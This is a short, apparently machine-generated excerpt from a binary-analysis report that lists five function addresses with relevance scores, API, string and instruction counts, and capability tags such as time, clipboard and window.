Function 004223D1, Relevance: 74.0, APIs: 38, Strings: 4, Instructions: 488
timeclipboardCOMMON

Function 004201B7, Relevance: 70.2, APIs: 37, Strings: 3, Instructions: 237
stringCOMMONLIBRARYCODE

Function 00426677, Relevance: 69.3, APIs: 46, Instructions: 335
timeCOMMON

Function 00420D64, Relevance: 59.8, APIs: 28, Strings: 6, Instructions: 331
timewindowlibraryCOMMON

Function 0041A2B3, Relevance: 52.7, APIs: 35, Instructions: 229
windowCOMMON